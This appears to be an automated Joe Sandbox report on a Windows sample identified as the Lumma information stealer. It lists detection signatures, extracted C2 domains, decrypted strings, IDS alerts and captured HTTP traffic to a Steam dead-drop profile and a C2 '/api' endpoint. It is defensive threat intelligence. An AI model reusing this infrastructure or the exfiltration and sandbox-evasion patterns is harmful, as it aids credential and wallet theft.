Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1532431
MD5:34124e70e2508de56d89b57345b39f65
SHA1:21ba55d1758aecf6a8d54e3550a1cf4c2764c255
SHA256:582e159bf52a2543356aaa21d4e0b6d12c831e53640bb2a92528d6b76a759a37
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7140 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 34124E70E2508DE56D89B57345B39F65)
    • WerFault.exe (PID: 2924 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7140 -s 1896 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["spirittunek.store", "bathdoomgaz.store", "clearancek.site", "licendfilteo.site", "eaglepawnoy.store", "dissapoiznw.store", "mobbipenju.store", "studennotediw.store"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T06:54:09.743288+020020546531A Network Trojan was detected192.168.2.549705104.21.53.8443TCP
    2024-10-13T06:54:10.829268+020020546531A Network Trojan was detected192.168.2.549706104.21.53.8443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T06:54:09.743288+020020498361A Network Trojan was detected192.168.2.549705104.21.53.8443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T06:54:10.829268+020020498121A Network Trojan was detected192.168.2.549706104.21.53.8443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T06:54:07.260005+020020564771Domain Observed Used for C2 Detected192.168.2.5549891.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T06:54:07.200212+020020564711Domain Observed Used for C2 Detected192.168.2.5606101.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T06:54:07.238202+020020564811Domain Observed Used for C2 Detected192.168.2.5563351.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T06:54:07.227366+020020564831Domain Observed Used for C2 Detected192.168.2.5610731.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T06:54:07.280214+020020564731Domain Observed Used for C2 Detected192.168.2.5631641.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T06:54:07.212395+020020564851Domain Observed Used for C2 Detected192.168.2.5580721.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T06:54:07.269827+020020564751Domain Observed Used for C2 Detected192.168.2.5525791.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T06:54:07.249676+020020564791Domain Observed Used for C2 Detected192.168.2.5650111.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T06:54:08.962762+020028586661Domain Observed Used for C2 Detected192.168.2.549704104.102.49.254443TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: file.exeAvira: detected
    Antivirus detection for URL or domain
    Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/badgesURL Reputation: Label: malware
    Found malware configuration
    Source: file.exe.7140.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["spirittunek.store", "bathdoomgaz.store", "clearancek.site", "licendfilteo.site", "eaglepawnoy.store", "dissapoiznw.store", "mobbipenju.store", "studennotediw.store"], "Build id": "4SD0y4--legendaryy"}
    Multi AV Scanner detection for domain / URL
    Source: sergei-esenin.comVirustotal: Detection: 17%Perma Link
    Source: licendfilteo.siteVirustotal: Detection: 15%Perma Link
    Source: bathdoomgaz.storeVirustotal: Detection: 21%Perma Link
    Source: studennotediw.storeVirustotal: Detection: 17%Perma Link
    Source: dissapoiznw.storeVirustotal: Detection: 21%Perma Link
    Source: eaglepawnoy.storeVirustotal: Detection: 18%Perma Link
    Source: spirittunek.storeVirustotal: Detection: 21%Perma Link
    Source: clearancek.siteVirustotal: Detection: 17%Perma Link
    Source: mobbipenju.storeVirustotal: Detection: 21%Perma Link
    Source: bathdoomgaz.storeVirustotal: Detection: 21%Perma Link
    Source: dissapoiznw.storeVirustotal: Detection: 21%Perma Link
    Source: studennotediw.storeVirustotal: Detection: 17%Perma Link
    Source: licendfilteo.siteVirustotal: Detection: 15%Perma Link
    Source: clearancek.siteVirustotal: Detection: 17%Perma Link
    Source: spirittunek.storeVirustotal: Detection: 21%Perma Link
    Source: eaglepawnoy.storeVirustotal: Detection: 18%Perma Link
    Source: mobbipenju.storeVirustotal: Detection: 21%Perma Link
    Source: https://sergei-esenin.com:443/apiVirustotal: Detection: 18%Perma Link
    Source: https://sergei-esenin.com/apiVirustotal: Detection: 18%Perma Link
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Machine Learning detection for sample
    Source: file.exeJoe Sandbox ML: detected
    Sample uses string decryption to hide its real strings
    Source: 00000000.00000002.2261645060.0000000000781000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000000.00000002.2261645060.0000000000781000.00000040.00000001.01000000.00000003.sdmpString decryptor: licendfilteo.site
    Source: 00000000.00000002.2261645060.0000000000781000.00000040.00000001.01000000.00000003.sdmpString decryptor: spirittunek.store
    Source: 00000000.00000002.2261645060.0000000000781000.00000040.00000001.01000000.00000003.sdmpString decryptor: bathdoomgaz.store
    Source: 00000000.00000002.2261645060.0000000000781000.00000040.00000001.01000000.00000003.sdmpString decryptor: studennotediw.store
    Source: 00000000.00000002.2261645060.0000000000781000.00000040.00000001.01000000.00000003.sdmpString decryptor: dissapoiznw.store
    Source: 00000000.00000002.2261645060.0000000000781000.00000040.00000001.01000000.00000003.sdmpString decryptor: eaglepawnoy.store
    Source: 00000000.00000002.2261645060.0000000000781000.00000040.00000001.01000000.00000003.sdmpString decryptor: mobbipenju.store
    Source: 00000000.00000002.2261645060.0000000000781000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000000.00000002.2261645060.0000000000781000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000000.00000002.2261645060.0000000000781000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
    Source: 00000000.00000002.2261645060.0000000000781000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
    Source: 00000000.00000002.2261645060.0000000000781000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
    Source: 00000000.00000002.2261645060.0000000000781000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
    Source: 00000000.00000002.2261645060.0000000000781000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49704 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49705 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49706 version: TLS 1.2

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.5:65011 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.5:52579 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.5:61073 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.5:60610 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.5:63164 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.5:58072 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.5:56335 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.5:54989 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49704 -> 104.102.49.254:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 104.21.53.8:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.53.8:443
    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 104.21.53.8:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 104.21.53.8:443
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: spirittunek.store
    Source: Malware configuration extractorURLs: bathdoomgaz.store
    Source: Malware configuration extractorURLs: clearancek.site
    Source: Malware configuration extractorURLs: licendfilteo.site
    Source: Malware configuration extractorURLs: eaglepawnoy.store
    Source: Malware configuration extractorURLs: dissapoiznw.store
    Source: Malware configuration extractorURLs: mobbipenju.store
    Source: Malware configuration extractorURLs: studennotediw.store
    Source: Joe Sandbox ViewIP Address: 104.21.53.8 104.21.53.8
    Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=hBo.L319DdN_T0PJa7tYvjmaL4kOlNqAcP2mUK4xBAM-1728795249-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: sergei-esenin.com
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: clearancek.site
    Source: global trafficDNS traffic detected: DNS query: mobbipenju.store
    Source: global trafficDNS traffic detected: DNS query: eaglepawnoy.store
    Source: global trafficDNS traffic detected: DNS query: dissapoiznw.store
    Source: global trafficDNS traffic detected: DNS query: studennotediw.store
    Source: global trafficDNS traffic detected: DNS query: bathdoomgaz.store
    Source: global trafficDNS traffic detected: DNS query: spirittunek.store
    Source: global trafficDNS traffic detected: DNS query: licendfilteo.site
    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: sergei-esenin.com
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
    Source: file.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
    Source: file.exe, 00000000.00000003.2078167697.0000000001225000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic
    Source: file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
    Source: file.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
    Source: file.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
    Source: file.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
    Source: file.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA
    Source: file.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
    Source: file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
